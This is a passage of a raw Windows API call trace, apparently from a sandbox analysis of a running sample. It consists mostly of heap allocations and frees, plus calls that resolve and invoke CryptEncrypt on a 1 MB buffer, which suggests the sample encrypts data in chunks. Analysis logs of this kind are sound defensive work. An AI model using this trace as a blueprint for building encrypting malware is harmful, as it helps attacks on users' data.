lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0243.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0243.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0243.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0243.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0243.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0243.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0243.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0243.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0243.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0243.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0243.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0243.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0243.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0243.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0243.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0243.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0243.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0243.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0243.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0243.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0243.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0243.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3ed0020 | out: hHeap=0x25c0000) returned 1 [0243.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0243.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0243.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0243.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0243.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0243.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0243.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.031] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0243.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0243.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0243.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0243.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0243.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0243.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0243.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0243.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0243.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0243.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0243.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0243.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0243.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0243.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0243.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0243.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0243.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0243.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0243.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0243.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0243.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0243.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0243.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0243.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0243.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0243.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0243.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aab20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0243.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0243.033] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0243.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0243.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0243.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b3ba0 [0243.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0243.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0243.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0243.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0243.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0243.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0243.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0243.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0243.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0243.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0243.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0243.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0243.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0243.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0243.034] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x100000, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x100000) returned 1 [0243.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0243.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0243.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0243.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0243.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0243.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0243.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0243.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0243.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0243.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0243.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0243.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0243.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0243.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0243.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0243.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0243.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0243.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0243.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0243.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0243.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0243.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0243.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0243.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0243.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0243.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0243.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0243.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0243.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0243.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0243.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0243.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0243.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0243.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0243.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0243.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0243.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0243.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0243.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0243.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0243.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0243.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0243.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0243.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0243.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0243.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0243.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0243.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0243.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0243.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0243.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0243.037] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0243.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0243.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0243.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0243.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0243.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0243.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0243.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0243.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0243.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0243.038] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0243.038] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0243.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0243.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0243.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0243.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0243.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0243.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0243.038] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0243.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0243.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0243.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0243.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0243.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0243.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0243.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0243.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0243.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0243.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0243.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0243.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0243.039] CharLowerBuffW (in: lpsz="byte[1048576]", cchLength=0xd | out: lpsz="byte[1048576]") returned 0xd [0243.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0243.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0243.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0243.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0243.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0243.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0243.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0243.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0243.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0243.040] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0243.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0243.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0243.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0243.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0243.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0243.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0243.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0243.041] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0243.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0243.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0243.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0243.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0243.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0243.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0243.042] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0243.042] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0243.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0243.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0243.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0243.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0243.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0243.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0243.042] CharUpperBuffW (in: 